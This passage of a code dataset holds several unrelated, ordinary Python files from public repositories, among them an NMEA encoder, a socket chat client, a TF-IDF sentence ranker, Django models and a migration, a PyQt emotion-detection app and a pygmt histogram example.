dest.btw_true is not None else ',' # 11 Bearing to destination deg true\n nmea += '{:.1f},'.format(dest.stw) if dest.stw is not None else ',' # 12 Destination closing velocity in knots\n nmea += 'A,' if dest.is_in_circle else 'V,' # 13 Arrival Status, A = Arrival Circle Entered. 
V = not entered/passed\n nmea += '' # 14 FAA mode indicator (NMEA 2.3 and later, optional)\n\n nmea = append_checksum(nmea)\n nmea += '\\r\\n'\n\n return nmea\n\n\ndef encode_coord(coord, hemispheres):\n hemisphere = hemispheres[0] if coord > 0 else hemispheres[1]\n coord = abs(coord)\n degrees = int(coord)\n minutes = (coord - degrees) * 60.\n\n return '{}{:.5f},{},'.format(degrees, minutes, hemisphere)\n\n\ndef append_checksum(nmea):\n cc = reduce(lambda i, j: int(i) ^ int(j), [ord(x) for x in nmea[1:]]) # Exclude $ sign\n return nmea + '*{:02X}'.format(cc)\n","repo_name":"sergei/ottopi","sub_path":"navcomputer/nmea_encoder.py","file_name":"nmea_encoder.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"}
{"seq_id":"15947432823","text":"# -*- coding: utf-8 -*-\n\n# Definition of a network client handling the sending and receiving of\n# messages in parallel (using 2 threads)\n\nimport setup\nimport os\nimport socket\nimport sys\nfrom threading import Thread\n\nHOST = setup.HOST\nPORT = setup.PORT\n\nif os.name == \"nt\": # Windows case\n os.system(\"cls\")\nelse:\n os.system(\"clear\")\n\n\nclass ThreadReception(Thread):\n \"\"\"Thread object handling the reception of messages\"\"\"\n\n def __init__(self, conn):\n Thread.__init__(self)\n self.connexion = conn # Reference to the connection socket\n\n def run(self):\n # Message reception loop: on each iteration, the flow of execution\n # blocks on self.connexion.recv while waiting for a new message -\n # but the rest of the program is not frozen\n # (the other threads keep working independently)\n while 1:\n message_recu = self.connexion.recv(1024).decode(\"utf-8\")\n if not message_recu or message_recu == \"FIN\":\n break\n print(\"*\" + message_recu + \"*\")\n # The reception thread ends here.\n # print(\"Le thread réception s'est terminé correctement.\")\n print(\"Taper Enter pour quitter.\")\n # Force the emission thread to close\n th_E.stop()\n self.connexion.close()\n\n\nclass ThreadEmission(Thread):\n \"\"\"Thread object handling the emission of messages\"\"\"\n\n def __init__(self, conn):\n Thread.__init__(self)\n self.connexion = conn # Reference to the connection socket\n self.terminated = False\n\n def run(self):\n # Message sending loop: on each iteration, the flow of execution\n # blocks on input(\"C> \") while waiting for keyboard input -\n # but the rest of the program is not frozen\n # (the other threads keep working independently)\n while 1:\n message_emis = input(\"C> \")\n if self.terminated:\n break\n self.connexion.send(message_emis.encode(\"utf-8\"))\n # if message_emis == \"FIN\":\n # break\n # The emission thread ends here.\n # print(\"Le thread émission s'est terminé correctement.\")\n # print(\"Client arrêté (Thread Emission). Connexion interrompue.\")\n 
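# sys.exit() raises SystemExit in this thread only: it stops the emission\n # thread but does not terminate the whole process.\n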
Connexion interrompue.\")\n sys.exit()\n\n def stop(self):\n self.terminated = True\n\n# Programme principal - Etablissement de la connexion\nconnexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnexionOK = False\nprint(PORT)\ntry:\n connexion.connect((HOST, PORT))\n connexionOK = True\nexcept socket.error:\n print(\"La connexion a échoué.\")\nif connexionOK is False:\n connexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"Nouvelle tentative en cours...\")\n PORT += 1\n print(PORT)\n try:\n connexion.connect((HOST, PORT))\n except socket.error:\n print(\"La connexion a échoué.\")\n sys.exit()\nprint(\"Connexion établie avec le serveur.\")\n\n# Dialogue avec le serveur : on instancie deux threads enfants pour gérer\n# indépendamment l'émission et la réception des messages\nth_E = ThreadEmission(connexion)\nth_R = ThreadReception(connexion)\n\nth_E.start()\nth_R.start()\n","repo_name":"NicolasMura/chat","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8464538925","text":"from collections import Counter\r\nimport sys, json, re\r\nimport math\r\n\r\ndef main():\r\n test_data = json.load(open('test.json', 'r', encoding='utf-8'))\r\n train_data = json.load(open('train.json', 'r', encoding='utf-8'))\r\n print(len(test_data))\r\n print(len(train_data))\r\n rowData = test_data + train_data\r\n # count idf\r\n idf = {}\r\n idf = Counter()\r\n for row in rowData:\r\n sentList = []\r\n for ev in row['evidence'].values():\r\n sentList += re.split(r'[?:。!().“”…\\t\\n]', ev['text'])\r\n # remove duplicates\r\n sentList = list(set(sentList))\r\n for sent in sentList:\r\n idf[sent] += 1\r\n document_count = len(rowData)\r\n for key in idf.keys():\r\n idf[key] = math.log(document_count/idf[key]+1)\r\n \r\n # count tf and select\r\n get_evidence_num = 5\r\n tdidf_ev = []\r\n for row in rowData:\r\n sentList = []\r\n for ev in row['evidence'].values():\r\n sentList += re.split(r'[?:。!().“”…\\t\\n]', ev['text'])\r\n tf = Counter()\r\n for sent in sentList:\r\n tf[sent] += 1\r\n for key in tf.keys():\r\n tf[key] = tf[key] / len(tf.keys())\r\n tf_idf = Counter()\r\n for sent in sentList:\r\n tf_idf[sent] = tf[sent] * idf[sent]\r\n tmp = list(tf_idf.items())\r\n tmp.sort(key=lambda s: s[1], reverse=True)\r\n tmp = [ele[0] for ele in tmp if len(ele[0]) > 5]\r\n tdidf_ev.append(tmp[:get_evidence_num])\r\n \r\n # with open('testTfidfSents.json', 'w', encoding='utf-8') as f:\r\n # json.dump(tdidf_ev[:len(test_data)], f, indent=2, ensure_ascii=False)\r\n # with open('trainTfidfSents.json', 'w', encoding='utf-8') as f:\r\n # json.dump(tdidf_ev[len(test_data):], f, indent=2, ensure_ascii=False)\r\n with open('tfidfSents.json', 'w', encoding='utf-8') as f:\r\n json.dump(tdidf_ev, f, indent=2, ensure_ascii=False)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"THU-BPM/CHEF","sub_path":"Pipeline/Data/Surface_Ranker.py","file_name":"Surface_Ranker.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"73"} +{"seq_id":"11100259953","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\n\n\nclass Child(models.Model):\n \"\"\"Child.\"\"\"\n\n class GENDERS:\n BOY = 'boy'\n GIRL = 'girl'\n\n CHOICES = (\n (BOY, 'Мальчик'),\n (GIRL, 'Девочка'),\n )\n\n photo = models.ImageField('Фотография', 
upload_to='children/%Y/%m/%d/', null=True, blank=True)\n name = models.CharField('Имя', max_length=255)\n gender = models.CharField('Пол', choices=GENDERS.CHOICES, max_length=4)\n birthdate = models.DateField('Дата рождения')\n classroom = models.SmallIntegerField('Класс', null=True, blank=True)\n is_pupil = models.BooleanField('Учится', default=False, db_index=True)\n\n class Meta:\n verbose_name = 'Ребенок'\n verbose_name_plural = 'Дети'\n\n def __str__(self):\n \"\"\"Str repr.\"\"\"\n return f'{self._meta.verbose_name} {self.name}'\n\n\nclass JournalEntry(models.Model):\n \"\"\"Journal Entry for Child.\"\"\"\n\n class PEOPLES:\n DAD = 'dad'\n MOM = 'mom'\n\n CHOICES = (\n (DAD, 'Папа'),\n (MOM, 'Мама'),\n )\n\n child = models.ForeignKey(Child, verbose_name=Child._meta.verbose_name, on_delete=models.CASCADE)\n timestamp_come = models.TimeField('Время прихода', db_index=True)\n timestamp_away = models.TimeField('Время ухода', null=True, blank=True, db_index=True)\n people_come = models.CharField('Кто привел ребенка', max_length=3, choices=PEOPLES.CHOICES)\n people_away = models.CharField('Кто забрал ребенка', max_length=3, choices=PEOPLES.CHOICES, blank=True)\n datestamp = models.DateField('Дата записи', db_index=True)\n\n class Meta:\n verbose_name = 'Запись в журнале'\n verbose_name_plural = 'Записи в журнале'\n unique_together = ('child', 'datestamp')\n\n def __str__(self):\n \"\"\"Str repr.\"\"\"\n return f'{self._meta.verbose_name} от {self.datestamp}'\n\n def clean_fields(self, exclude=None):\n \"\"\"\n Clean fields.\n\n Check when timestamp_away and people_away both equals None or both equals anything.\n\n :param exclude:\n :return:\n \"\"\"\n super().clean_fields(exclude=exclude)\n one_of_fields_filled = self.timestamp_away or self.people_away\n both_fields_filled = self.timestamp_away and self.people_away\n if one_of_fields_filled and not both_fields_filled:\n timestamp_away_verbose_name = self._meta.get_field('timestamp_away').verbose_name\n people_away_verbose_name = self._meta.get_field('people_away').verbose_name\n raise ValidationError(\n f'В отметке об уходе надо заполнить поля {timestamp_away_verbose_name} и {people_away_verbose_name}',\n )\n","repo_name":"codeleta/test_task_for_robotvera","sub_path":"creche/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74169650157","text":"'''\nchenqumi@20180815\nSpeeding Up Motif Finding\nThe failure array of s is an array P of length n for which \nP[k] is the length of the longest substring s[j:k] \nthat is equal to some prefix s[1:k−j+1], where j CANNOT equal 1 \n(otherwise, P[k] would always equal k). 
By convention, P[1]=0\n'''\nimport sys\n\n\nif len(sys.argv) == 1:\n print(\"\\nUsage: {} <> \".format(sys.argv[0]))\n sys.exit()\n\nfa = sys.argv[1]\n\n\ndef kmp_preprocess(s):\n j = -1\n b = [j]\n\n for i, c in enumerate(s):\n while j >= 0 and s[j] != c:\n j = b[j]\n j += 1\n b.append(j)\n\n return b[1:]\n\n\nids = ''\nfaDic = {}\nwith open(fa) as FA:\n for line in FA:\n line = line.strip()\n if line.startswith('>'):\n ids = line.split('>')[1]\n faDic[ids] = ''\n else:\n faDic[ids] += line\n\nseq = faDic[ids]\n\n\nF_array = [0] * len(seq)\nk = 0\nfor i in range(2, len(seq) + 1):\n while k > 0 and seq[k] != seq[i - 1]:\n k = F_array[k - 1]\n if seq[k] == seq[i - 1]:\n k += 1\n F_array[i - 1] = k\n\n# for i in F_array:\n# print(i, end=' ')\n# for i in kmp_preprocess(seq):\n# print(i, end=' ')","repo_name":"chenqumi/Rosalind","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2398575400","text":"from fa_purity.json_2 import (\n LegacyAdapter,\n)\nfrom fa_singer_io.singer import (\n SingerState,\n)\nfrom tap_gitlab.state import (\n EtlState,\n)\nfrom tap_gitlab.state.encoder import (\n encode_etl_state,\n)\n\n\ndef state_to_singer(state: EtlState) -> SingerState:\n encoded = LegacyAdapter.to_legacy_json(encode_etl_state(state))\n return SingerState(encoded)\n","repo_name":"cognettings/vulscanner","sub_path":"observes/singer/tap-gitlab/tap_gitlab/singer/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"73917988077","text":"import imp\nimport sys\nfrom PyQt5.QtWidgets import *\nimport time\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QThread, pyqtSignal\nfrom pip import main\nfrom tensorflow.keras.models import load_model\n\nimport cv2\nfrom PIL import Image\nfrom keras.preprocessing import image\nimport numpy as np\nfrom skimage import io\n\nmainresult = \"\"\n\nclass App(QMainWindow):\n \n\n def __init__(self):\n super().__init__()\n self.title = 'M-IVT-21 Group3 app'\n self.left = 200\n self.top = 200\n self.width = 350\n self.height = 500\n self.queryimg=None\n self.dir_path=None #\"C:/Users/vovaz/Documents/example/Image-Classifier/images/001_0007.jpg\"\n self.initUI()\n self.setWindowIcon(QtGui.QIcon('icon.png'))\n self.threadpool = QtCore.QThreadPool()\n\n def initUI(self):\n self.central=QWidget()\n self.setCentralWidget(self.central)\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.mainbox=QVBoxLayout()\n self.central.setLayout(self.mainbox)\n self.createUI()\n self.show()\n\n\n def createUI(self):\n for i in reversed(range(self.mainbox.count())):\n self.mainbox.itemAt(i).widget().setParent(None)\n\n self.labelmain = QLabel()\n self.labelmain.setAlignment(QtCore.Qt.AlignCenter)\n self.labelmain.setMaximumHeight(50)\n self.labelmain.setText(\"Emotion detector\")\n self.labelmain.setStyleSheet(\"background-color : #62524D;\"\n \"color : white\")\n self.central.setStyleSheet(\"background-color : #9B8888;\")\n font = QtGui.QFont('SansSerif', 20)\n self.labelmain.setFont(font)\n self.mainbox.addWidget(self.labelmain)\n\n self.chooseBtn = QPushButton()\n self.chooseBtn.setText('Выбрать изображение')\n self.chooseBtn.setFixedSize(350,32)\n self.chooseBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n 
\"border-bottom: 4px solid #6F665A\")\n self.aboutBtn = QPushButton(self)\n self.aboutBtn.setText('О приложении')\n self.aboutBtn.setFixedSize(350, 32)\n self.aboutBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n\n self.groupbox = QGroupBox()\n self.box1 = QHBoxLayout()\n self.groupbox.setFixedHeight(40)\n self.groupbox.setLayout(self.box1)\n self.box1.addWidget(self.aboutBtn)\n self.groupbox.setStyleSheet(\"border : 0px\")\n\n self.groupbox1 = QGroupBox()\n self.box2 = QHBoxLayout()\n self.box2.addWidget(self.chooseBtn)\n self.groupbox1.setLayout(self.box2)\n self.groupbox1.setFixedHeight(40)\n self.groupbox1.setStyleSheet(\"border : 0px\")\n\n self.groupbox2 = QGroupBox()\n self.queryLayout = QHBoxLayout()\n self.groupbox2.setLayout(self.queryLayout)\n self.groupbox2.setStyleSheet(\"background-image : url(icon.png);\"\n \"background-repeat : no-repeat;\"\n \"background-position : center;\"\n \"border : 0px\")\n\n\n self.mainbox.addWidget(self.groupbox2)\n self.mainbox.addWidget(self.groupbox1)\n self.mainbox.addWidget(self.groupbox)\n\n\n self.chooseBtn.clicked.connect(self.openFileNameDialog)\n self.aboutBtn.clicked.connect(self.start)\n\n\n def start(self):\n self.groupbox2.setStyleSheet(\"\")\n self.labelmain.setText(\"О приложении\")\n self.labelabout = QLabel()\n self.labelabout.setAlignment(QtCore.Qt.AlignHCenter)\n self.labelabout.setText(\"Выполнили:\\n\"\n \"Дегтярев А.В.\\n\"\n \"Заморщикова Д.А.\\n\"\n \"Лотов А.Р.\\n\"\n \"Цель проекта:\\n\"\n \"Разработать модель нейронной сети \\n\"\n \"по распознаванию эмоций по \\n\"\n \"фотографиям и разработать к нему\\n\"\n \"графический интерфейс.\\n\"\n \"\\n\"\n \"\\n\"\n \"Основные функциональные особенности\\n\"\n \"и свойства:\\n\"\n \"1) Определение и выделение лица\\n\"\n \"на фотографиях, если на фотографии\\n\"\n \" не только лицо.\\n\" \n \"2) Особенность распознавать 7 видов\\n\"\n \" эмоций человека по выражениям лица:\\n\"\n \"Злость, отвращение, страх, счастье,\\n\"\n \" нейтральный, грусть, удивление.\\n \"\n \"3) Распознавания и выделения эмоций\\n\"\n \"и количественный анализ различных эмоций\\n\"\n \"(добавить цвета выделения и вывод количества).\")\n font = QtGui.QFont('SansSerif', 10)\n self.labelabout.setFont(font)\n self.queryLayout.addWidget(self.labelabout)\n self.groupbox2.setStyleSheet(\"border : 0px\")\n\n self.chooseBtn.setVisible(False)\n self.aboutBtn.setVisible(False)\n\n self.menuBtn = QPushButton()\n self.menuBtn.setText('В главное меню')\n self.menuBtn.setFixedSize(350, 32)\n self.menuBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.groupbox3 = QGroupBox()\n self.box3 = QHBoxLayout()\n self.groupbox3.setFixedHeight(40)\n self.groupbox3.setLayout(self.box3)\n self.box3.addWidget(self.menuBtn)\n self.groupbox3.setStyleSheet(\"border : 0px\")\n\n self.menuBtn.clicked.connect(self.createUI)\n self.mainbox.addWidget(self.groupbox3)\n\n\n def openFileNameDialog(self): ## USE THIS TO GET PATH OF QUERY IMAGE...\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self,\"Select Image\", \"\",\"Image files (*.jpg *.gif *.png)\")\n self.groupbox2.setStyleSheet(\"\")\n if fileName:\n self.queryimg = fileName\n self.im1 = QtGui.QPixmap(fileName).scaled(400, 300, QtCore.Qt.KeepAspectRatio)\n self.label1 = QLabel()\n self.label1.setAlignment(QtCore.Qt.AlignCenter)\n self.label1.setPixmap(self.im1)\n if 
self.queryLayout.count()==0:\n self.queryLayout.addWidget(self.label1)\n else:\n self.queryLayout.itemAt(0).widget().setParent(None)\n self.queryLayout.addWidget(self.label1)\n\n self.groupbox2.setStyleSheet(\"border : 0px\")\n self.chooseBtn.setVisible(False)\n self.aboutBtn.setVisible(False)\n self.resultBtn = QPushButton()\n self.resultBtn.setText('Результат')\n self.resultBtn.setFixedSize(350, 32)\n self.resultBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.groupbox4 = QGroupBox()\n self.box4 = QHBoxLayout()\n self.groupbox4.setFixedHeight(40)\n self.groupbox4.setLayout(self.box4)\n self.box4.addWidget(self.resultBtn)\n self.groupbox4.setStyleSheet(\"border : 0px\")\n self.resultBtn.clicked.connect(self.result)\n self.mainbox.addWidget(self.groupbox4)\n\n self.menuBtn = QPushButton()\n self.menuBtn.setText('В главное меню')\n self.menuBtn.setFixedSize(350, 32)\n self.menuBtn.setStyleSheet(\"background-color : #B7ADA1;\"\n \"border-radius : 10px;\"\n \"border-bottom: 4px solid #6F665A\")\n self.groupbox5 = QGroupBox()\n self.box5 = QHBoxLayout()\n self.groupbox5.setFixedHeight(40)\n self.groupbox5.setLayout(self.box5)\n self.box5.addWidget(self.menuBtn)\n self.groupbox5.setStyleSheet(\"border : 0px\")\n self.mainbox.addWidget(self.groupbox5)\n self.menuBtn.clicked.connect(self.createUI)\n\n def result(self):\n self.pbar = QProgressBar(self)\n self.pbar.setValue(0)\n self.mainbox.addWidget(self.pbar)\n\n self.thread = Thread()\n self.thread._signal.connect(self.signal_accept)\n self.thread.start()\n\n # code goes here\n # the image path is stored in path_to_image = self.queryimg\n # the result is saved in the variable result in def signal_accept\n # load the saved model\n model = load_model('model')\n \n path_to_image = self.queryimg\n \n \n # adding the model data\n prototxt_path = \"./SSD/deploy.prototxt.txt\"\n model_path = \"./SSD/res10_300x300_ssd_iter_140000_fp16.caffemodel\"\n\n # load the Caffe model\n modelssd = cv2.dnn.readNetFromCaffe(prototxt_path, model_path)\n\n # read the image\n img = io.imread(path_to_image)\n # get the image width and height\n h, w = img.shape[:2]\n\n # preprocessing: resize and mean subtraction\n blob = cv2.dnn.blobFromImage(img, 1.0, (300, 300), (104.0, 177.0, 123.0))\n\n # set the image as the input of the neural network\n modelssd.setInput(blob)\n # run inference and get the result\n output = np.squeeze(modelssd.forward())\n\n print(output.shape[0])\n\n font_scale = 1.0\n for i in range(0, output.shape[0]):\n # get the confidence\n confidence = output[i, 2]\n # if the confidence is above 50%, draw the surrounding rectangle\n if confidence > 0.5:\n # get the bounding-box coordinates and scale them to the original image\n box = output[i, 3:7] * np.array([w, h, w, h])\n # convert to integers\n start_x, start_y, end_x, end_y = box.astype(int)\n # draw a rectangle around the face\n cv2.rectangle(img, (start_x, start_y), (end_x, end_y), color=(255, 0, 0), thickness=2)\n # also draw the confidence text\n cv2.putText(img, f\"{confidence*100:.2f}%\", (start_x, start_y-5), cv2.FONT_HERSHEY_SIMPLEX, font_scale, (255, 0, 0), 2)\n\n x = (start_x + end_x) / 2\n y = (start_y + end_y) / 2 \n\n if end_x - start_x < end_y - start_y:\n weith = end_x - start_x\n else: weith = end_y - start_y \n\n weith = weith * 0.5\n\n print(\"----------------------------------------------------------------\")\n print(box)\n\n img = 
Image.open(path_to_image)\n img_crop = img.crop((x - weith, y - weith, x + weith, y + weith))\n img_crop.save(\"testing.jpg\", quality=100)\n \n img = image.load_img(\"./testing.jpg\",target_size = (48,48),color_mode = \"grayscale\")\n img = np.array(img)\n label_dict = {0:'Злость',1:'Отвращение',2:'Страх',3:'Радость',4:'Нейтральный',5:'Грустный',6:'Удивление'}\n img = np.expand_dims(img,axis = 0) #makes image shape (1,48,48)\n img = img.reshape(1,48,48,1)\n result = model.predict(img)\n result = list(result[0])\n img_index = result.index(max(result))\n global mainresult\n mainresult = label_dict[img_index]\n\n\n def signal_accept(self, msg):\n self.pbar.setValue(int(msg))\n if self.pbar.value() == 99:\n self.pbar.setValue(100)\n result = mainresult # В виде строки\n self.resultBtn.setText(result)\n self.resultBtn.setDisabled(True)\n self.pbar.setVisible(False)\n return\n\nclass Thread(QThread):\n _signal = pyqtSignal(int)\n def __init__(self):\n super(Thread, self).__init__()\n\n def __del__(self):\n self.wait()\n\n def run(self):\n for i in range(100):\n time.sleep(0.01)\n self._signal.emit(i)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())","repo_name":"Aytaldeg/Emotion-detection-M-IVT-21-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13690,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"11609950393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Basket',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('total', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=128)),\n ('slug', models.SlugField(default=b'', unique=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('representative', models.BooleanField(default=False)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Offer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('price', models.DecimalField(default=0, max_digits=7, decimal_places=2)),\n ('views', models.IntegerField(default=0)),\n ('likes', models.IntegerField(default=0)),\n ('description', models.TextField(default=b'', max_length=300)),\n ('category', models.ForeignKey(to='radar.Category')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Transaction',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField(auto_now_add=True)),\n ('customer', models.ForeignKey(to='radar.Customer')),\n ('item', models.ForeignKey(to='radar.Offer')),\n ],\n options={\n 
},\n            bases=(models.Model,),\n        ),\n        migrations.AddField(\n            model_name='basket',\n            name='customer',\n            field=models.ForeignKey(to='radar.Customer'),\n            preserve_default=True,\n        ),\n        migrations.AddField(\n            model_name='basket',\n            name='item',\n            field=models.ManyToManyField(to='radar.Offer'),\n            preserve_default=True,\n        ),\n    ]\n","repo_name":"2026929z/Bargain_Radar","sub_path":"bargain_radar_project/radar/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1061422049","text":"class Solution:\n    def checkString(self, s: str) -> bool:\n        s_dict = {}\n        for x in s:\n            s_dict[x] = s_dict.get(x, 0) + 1\n        # if 'a' occurs, s must begin with all len_a of its 'a' characters\n        if \"a\" in s:\n            len_a = s_dict['a']\n            if s[:len_a] == ('a' * len_a):\n                return True\n        # if 'a' does not occur at all (and s is not empty), no 'b' can precede an 'a'\n        elif \"a\" not in s and s != '':\n            return True \n        return False\n        ","repo_name":"VidaMaleki/LeetCode","sub_path":"2124-check-if-all-as-appears-before-all-bs/2124-check-if-all-as-appears-before-all-bs.py","file_name":"2124-check-if-all-as-appears-before-all-bs.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31782846811","text":"# This script plots the ground truth trajectories as recorded by the robot arm and the coordinate frames\n# of the as it moves along the trajectory. Do not mess with rotations in this code ever!!!!\n#\n# Author and Maintainer: Tejaswi Digumarti (tejaswi.digumarti@sydney.edu.au)\n\nimport numpy as np\nimport utils\nimport os\n\nimport matplotlib.pyplot as plt\n\n\nif __name__ == \"__main__\":\n    sequence = 14\n    folder = \"/media/dtejaswi/Seagate Expansion Drive/JoeDanielThesisData/data/sequences/seq\" + str(sequence)\n    # make a list of all the pose files in the folder and sort numerically\n    pose_files = [f for f in os.listdir(folder) if f.endswith(\".txt\")]\n    pose_files = [os.path.join(folder, f) for f in sorted(pose_files)]\n\n    # read poses and load into an array\n    poses = []\n    for i in range(0, len(pose_files)):\n        pose_file_name = '{0:06d}.txt'.format(i)\n        file_path = open(os.path.join(folder, pose_file_name), 'r')\n        p = file_path.readlines()[0]\n        p = p.replace('(', '').replace(')', '').replace(']', '').replace('[', '')\n        p = np.fromstring(p, sep=',')\n\n        poses.append(p)\n    poses = np.array(poses).reshape((-1, 6))\n\n    # transformation to convert from end effector to camera frame\n    transform_e_c = np.eye(4)\n    transform_e_c[0, 0] = -1\n    transform_e_c[1, 1] = -1\n\n    # any other transformation that we wish to apply\n    additional_transform = np.eye(4)\n    additional_transform[0, 0] = additional_transform[1, 1] = 0\n    additional_transform[0, 1] = -1\n    additional_transform[1, 0] = 1\n\n    poses_w_c = np.zeros((poses.shape[0], 4, 4))  # keep the altered poses as transformation matrices\n    for i in range(poses.shape[0]):\n        pose_w_e = utils.get_4x4_from_pose(poses[i, :])\n        pose_w_c = pose_w_e @ transform_e_c @ additional_transform  # this chaining of transformations is correct\n        poses_w_c[i, :, :] = pose_w_c\n\n    # -------------------\n    # plot trajectories\n    # -------------------\n    fig = plt.figure()\n    plt.suptitle(str(sequence))\n    ax = fig.add_subplot(111, projection='3d')\n    ax.view_init(elev=88, azim=-90)\n\n    # plot x, y, z positions\n    ax.plot3D(poses[:, 0], poses[:, 1], poses[:, 2], 'k')\n    ax.plot3D(poses[0, 0], poses[0, 1], poses[0, 2], 'go')\n    ax.plot3D(poses[-1, 0], poses[-1, 1], 
poses[-1, 2], 'rx')\n\n # ax.plot3D(poses_w_c[:, 0, 3], poses_w_c[:, 1, 3], poses_w_c[:, 2, 3], 'b')\n # ax.plot3D(poses_w_c[0, 0, 3], poses_w_c[0, 1, 3], poses_w_c[0, 2, 3], 'go')\n # ax.plot3D(poses_w_c[-1, 0, 3], poses_w_c[-1, 1, 3], poses_w_c[-1, 2, 3], 'rx')\n\n # draw coordinate axes of the end effector and the camera in the base frame\n for i in range(0, len(poses), 2):\n pose_w_e = utils.get_4x4_from_pose(poses[i, :])\n utils.draw_axes_at(pose_w_e[:], ax, scale=0.01, frame_label=i, arrowstyle='->') # end effector wrt base\n utils.draw_axes_at(poses_w_c[i, :], ax, scale=0.03, frame_label=i, arrowstyle='->') # camera wrt base\n\n ax.set_xlabel(\"X\")\n ax.set_ylabel(\"Y\")\n ax.set_zlabel(\"Z\")\n # ax.set_xlim([-0.8, 0.8])\n ax.set_ylim([0, 0.8])\n ax.set_zlim([0, 0.8])\n plt.show()\n","repo_name":"RoboticImaging/LearnLFOdo_IROS2021","sub_path":"tests/plot_trajectories_and_frames.py","file_name":"plot_trajectories_and_frames.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"34038083701","text":"\"\"\"\nHistogram\n=========\n\nThe :meth:`pygmt.Figure.histogram` method can plot regular histograms.\nUsing the ``series`` parameter allows to set the interval for the width of\neach bar. The type of the histogram (frequency count or percentage) can be\nselected via the ``histtype`` parameter.\n\"\"\"\n\n# %%\nimport numpy as np\nimport pygmt\n\n# Generate random elevation data from a normal distribution\nrng = np.random.default_rng(seed=100)\nmean = 100 # mean of distribution\nstddev = 25 # standard deviation of distribution\ndata = rng.normal(loc=mean, scale=stddev, size=521)\n\n\nfig = pygmt.Figure()\n\nfig.histogram(\n data=data,\n # Define the frame, add a title, and set the background color to\n # \"lightgray\". 
Add labels to the x-axis and y-axis\n    frame=[\"WSne+tHistogram+glightgray\", \"x+lElevation (m)\", \"y+lCounts\"],\n    # Generate evenly spaced bins by increments of 5\n    series=5,\n    # Use \"red3\" as color fill for the bars\n    fill=\"red3\",\n    # Use the pen parameter to draw the outlines with a width of 1 point\n    pen=\"1p\",\n    # Choose histogram type 0, i.e., counts [Default]\n    histtype=0,\n)\n\nfig.show()\n","repo_name":"GenericMappingTools/pygmt","sub_path":"examples/gallery/histograms/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":676,"dataset":"github-code","pt":"73"} +{"seq_id":"4793888515","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom taggit.models import Tag\n\nfrom account.models import Profile\nfrom .forms import SearchForm\n\n\n# Create your views here.\n\n\ndef users_search(request):\n\n    users = User.objects.all().exclude(id=request.user.id)\n    reserve_users = []\n\n    if request.method == 'POST':\n        form = SearchForm(request.POST)\n\n\n        if form.is_valid():\n            data = form.cleaned_data\n            